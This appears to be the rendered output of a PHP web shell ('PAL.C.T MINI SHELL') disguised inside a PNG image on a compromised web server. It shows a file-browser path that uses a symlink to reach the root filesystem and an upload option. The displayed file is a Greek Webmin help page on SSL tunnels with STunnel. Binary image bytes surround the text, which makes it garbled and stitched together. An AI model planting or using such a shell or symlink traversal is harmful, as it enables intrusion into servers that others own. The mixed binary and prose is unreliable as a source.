php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/libexec/webmin/stunnel/help/
upload
files >> /var/www/html/sub/images/sym/root/usr/libexec/webmin/stunnel/help/intro.el.auto.html

<header> Εισαγωγή στις σήραγγες SSL </header> Το SSL είναι ένα πρωτόκολλο για την κρυπτογράφηση δεδομένων σε μια σύνδεση TCP καθώς ταξιδεύει μέσω του δικτύου. Αρχικά αναπτύχθηκε για την προστασία της κυκλοφορίας μεταξύ προγραμμάτων περιήγησης και διακομιστών ιστού, αλλά μπορεί να χρησιμοποιηθεί για την κρυπτογράφηση οποιουδήποτε είδους ροής δεδομένων που κανονικά θα αποστέλλεται μέσω του πρωτοκόλλου TCP. <p> Το πρωτόκολλο SSL επιτρέπει στους πελάτες και τους διακομιστές να κάνουν έλεγχο ταυτότητας μεταξύ τους, έτσι ώστε ένας πελάτης να μπορεί να είναι σίγουρος ότι συνδέεται πραγματικά με τον κεντρικό υπολογιστή που πιστεύει ότι είναι. Αυτό γίνεται χρησιμοποιώντας πιστοποιητικά που εκδίδονται από αρχή έκδοσης πιστοποιητικών αναγνωρισμένη από τον πελάτη (έτσι ώστε να μπορούν να επαληθευτούν) και να συσχετιστούν με ένα συγκεκριμένο όνομα κεντρικού υπολογιστή. Χωρίς πιστοποιητικά, ένας εισβολέας θα μπορούσε να κατευθύνει ξανά μια σύνδεση SSL στον δικό του διακομιστή και να καταγράψει ευαίσθητες πληροφορίες από έναν πελάτη που πιστεύει ότι μιλά στον πραγματικό διακομιστή. <p> Τυχόν δεδομένα που ταξιδεύουν στο Διαδίκτυο χωρίς κρυπτογράφηση μπορούν να συλληφθούν και να διαβαστούν από έναν εισβολέα με πρόσβαση σε ένα από τα δίκτυα στα οποία περνά. Ακόμη και τα δεδομένα που ταξιδεύουν μεταξύ ενός συστήματος πελάτη και διακομιστή σε ένα LAN μπορούν να ακουστούν εύκολα. Όταν συνδέεστε σε διακομιστή telnet, FTP ή POP3, ο κωδικός πρόσβασής σας αποστέλλεται μέσω του δικτύου και έτσι μπορεί να καταγραφεί από έναν εισβολέα. <p> Το SSL μπορεί να χρησιμοποιηθεί για την προστασία δεδομένων σε τέτοιου είδους καταστάσεις, αλλά μόνο εάν το υποστηρίζουν τόσο ο πελάτης όσο και ο διακομιστής. Τα περισσότερα προγράμματα περιήγησης ιστού και πελάτες αλληλογραφίας μπορούν να κάνουν SSL-κρυπτογραφημένες συνδέσεις HTTP, POP3 και IMAP, αλλά δεν μπορούν να τις αποδεχτούν όλοι οι διακομιστές ιστού και POP3. Το POP3 είναι ιδιαίτερα δύσκολο να προστατευθεί, επειδή ο τυπικός διακομιστής που συνοδεύει τα περισσότερα συστήματα Unix δεν υποστηρίζει καθόλου το SSL. Ευτυχώς αν και υπάρχει μια λύση - STunnel. <p> Το STunnel είναι ένα απλό πρόγραμμα που μετατρέπει μια μη κρυπτογραφημένη σύνδεση σε μια κρυπτογραφημένη με SSL. Συνήθως έχει ρυθμιστεί ώστε να εκτελείται από έναν υπερ-διακομιστή όπως το inetd ή το xinetd και, στη συνέχεια, να εκτελεί κάποιο άλλο πρόγραμμα όπως ο διακομιστής POP3 που δεν υποστηρίζει SSL. Αυτή η σχεδίαση επιτρέπει την προστασία οποιουδήποτε διακομιστή που εκτελείται κανονικά από το inetd, όπως διακομιστές telnet, NNTP και IMAP. <p> Δεν μπορούν όλοι οι διακομιστές να προστατευτούν με κρυπτογράφηση, επειδή δεν υπάρχει πελάτης που να τους χρησιμοποιεί σε λειτουργία SSL. Για παράδειγμα, δεν έχω ακούσει ποτέ για έναν πελάτη telnet ή FTP που μπορεί να χρησιμοποιήσει SSL, επειδή το κοινό πακέτο SSH επιτρέπει ήδη κρυπτογραφημένες απομακρυσμένες συνδέσεις και μεταφορές αρχείων. <p> Αυτή η λειτουργική μονάδα Webmin διευκολύνει τη ρύθμιση υπηρεσιών υπερ-διακομιστή που εκτελούν το STunnel για να ξεκινήσει κάποιο πρόγραμμα διακομιστή. Παρόλο που αυτό μπορεί να γίνει χειροκίνητα χρησιμοποιώντας τη λειτουργική μονάδα Internet Services, αυτή έχει σχεδιαστεί ειδικά για τη ρύθμιση και τη διαμόρφωση του STunnel. Ανιχνεύει αυτόματα εάν έχετε εγκαταστήσει inetd και / ή xinetd, διαβάζει τις διαμορφώσεις τους για να ελέγξει για υπάρχουσες σήραγγες SSL και τις προσθέτει όταν δημιουργείτε μια νέα σήραγγα. Εάν και τα δύο είναι εγκατεστημένα, νέα σήραγγα SSL προστίθενται στη διαμόρφωση xinetd, καθώς είναι το ανώτερο των δύο κατά τη γνώμη μου. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`